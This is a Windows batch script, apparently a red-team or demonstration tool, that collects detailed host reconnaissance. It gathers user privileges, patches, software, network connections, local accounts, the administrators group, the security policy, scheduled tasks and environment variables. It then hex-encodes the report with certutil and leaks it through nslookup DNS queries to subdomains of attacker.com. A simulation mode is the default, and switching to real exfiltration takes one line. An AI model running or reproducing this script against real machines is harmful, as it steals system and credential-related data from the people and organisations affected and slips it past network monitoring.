@echo off
setlocal enabledelayedexpansion

REM ==========================================================================
REM System Information Collection and DNS Exfiltration Script
REM Author: Jacques Gariépy
REM Date: %DATE%
REM ==========================================================================

REM -- Mode Configuration --
REM Set Mode to "/sim" for simulation or "/real" for actual exfiltration
set "Mode=/sim"  REM Change this to "/real" for actual exfiltration

REM -- Output file configuration --
set "OutputFile=%USERPROFILE%\Desktop\Security_Report_%COMPUTERNAME%_%date:~-4,4%%date:~-7,2%%date:~-10,2%.txt"
set "TempHex=temp.hex"
set "Domain=attacker.com"

REM -- Mode Validation --
if /i not "%Mode%"=="/sim" if /i not "%Mode%"=="/real" (
    echo Invalid Mode. Set Mode to "/sim" or "/real".
    exit /b
)

REM -- Step 1: Collect information in the output file --
echo Report generated by: %USERNAME% > %OutputFile%
echo Date and Time: %DATE% %TIME% >> %OutputFile%
echo Machine: %COMPUTERNAME% >> %OutputFile%
echo ================================================================ >> %OutputFile%
echo. >> %OutputFile%
echo [*** START OF INFORMATION COLLECTION ***] >> %OutputFile%
echo. >> %OutputFile%

echo [--- Section 1: User and Machine Information ---] >> %OutputFile%
echo Current Directory: %CD% >> %OutputFile%
echo User Domain: %USERDOMAIN% >> %OutputFile%
echo Logon Server: %LOGONSERVER% >> %OutputFile%
(whoami /all) >> %OutputFile% 2>&1
echo. >> %OutputFile%

echo [--- Section 2: System Information (OS, Hotfixes) ---] >> %OutputFile%
(systeminfo) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [Hotfixes (WMIC QFE)] >> %OutputFile%
(wmic qfe list full /format:list) >> %OutputFile% 2>&1
echo. >> %OutputFile%

echo [--- Section 3: Installed Software (via MSI - Potentially incomplete list) ---] >> %OutputFile%
(wmic product get Name, Version, Vendor, InstallDate) >> %OutputFile% 2>&1
echo. >> %OutputFile%

echo [--- Section 4: Network Configuration ---] >> %OutputFile%
echo [IPCONFIG /ALL] >> %OutputFile%
(ipconfig /all) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [NETSTAT -ANOB (Open ports and associated processes)] >> %OutputFile%
(netstat -anob) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [Windows Firewall Status] >> %OutputFile%
(netsh advfirewall show allprofiles) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [Network Shares (NET SHARE)] >> %OutputFile%
(net share) >> %OutputFile% 2>&1
echo. >> %OutputFile%

echo [--- Section 5: Processes and Services ---] >> %OutputFile%
echo [TASKLIST /SVC] >> %OutputFile%
(tasklist /svc) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [Services (SC QUERY)] >> %OutputFile%
(sc query state= all) >> %OutputFile% 2>&1
echo. >> %OutputFile%

echo [--- Section 6: Local Accounts and Security ---] >> %OutputFile%
echo [Local User Accounts (NET USER)] >> %OutputFile%
(net user) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [Members of Local Administrators Group] >> %OutputFile%
(net localgroup administrators) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [Password Policy (NET ACCOUNTS)] >> %OutputFile%
(net accounts) >> %OutputFile% 2>&1
echo. >> %OutputFile%
echo [Export Local Security Policy (to SecPol.cfg)] >> %OutputFile%
del SecPol.cfg > nul 2>&1
secedit /export /cfg SecPol.cfg /quiet
IF EXIST SecPol.cfg (type SecPol.cfg >> %OutputFile%) ELSE (echo Failed to export SecPol.cfg >> %OutputFile%)
echo. >> %OutputFile%

echo [--- Section 7: Scheduled Tasks ---] >> %OutputFile%
(schtasks /query /fo LIST /v) >> %OutputFile% 2>&1
echo. >> %OutputFile%

echo [--- Section 8: Environment Variables ---] >> %OutputFile%
(set) >> %OutputFile% 2>&1
echo. >> %OutputFile%

echo [*** END OF INFORMATION COLLECTION ***] >> %OutputFile%
echo. >> %OutputFile%
echo ================================================================ >> %OutputFile%

REM -- Step 2: Encode the file in hexadecimal --
certutil -encodehex %OutputFile% %TempHex% >nul 2>&1

REM -- Step 3: Exfiltrate via DNS or simulate based on Mode --
set "Cumulative="
set "LineCount=0"
set "SegmentSize=62"

for /f "tokens=2-17" %%a in (%TempHex%) do (
    set "HexLine="
    for %%b in (%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m %%n %%o %%p) do (
        set "HexLine=!HexLine!%%b"
    )
    set "Cumulative=!Cumulative!!HexLine!"
    set /a LineCount+=1

    if !LineCount! geq 10 (
        call :SendSegments
        set "Cumulative="
        set /a LineCount=0
    )
)

if !LineCount! gtr 0 call :SendSegments

REM -- Cleanup --
del %TempHex%
goto :eof

:SendSegments
set "Offset=0"
:Loop
set "Segment=!Cumulative:~%Offset%,%SegmentSize%!"
if "!Segment!"=="" goto :eof
if /i "%Mode%"=="/sim" (
    echo Simulate sending: !Segment!.%Domain%
) else if /i "%Mode%"=="/real" (
    nslookup !Segment!.%Domain% >nul 2>&1
)
set /a Offset+=SegmentSize
goto :Loop
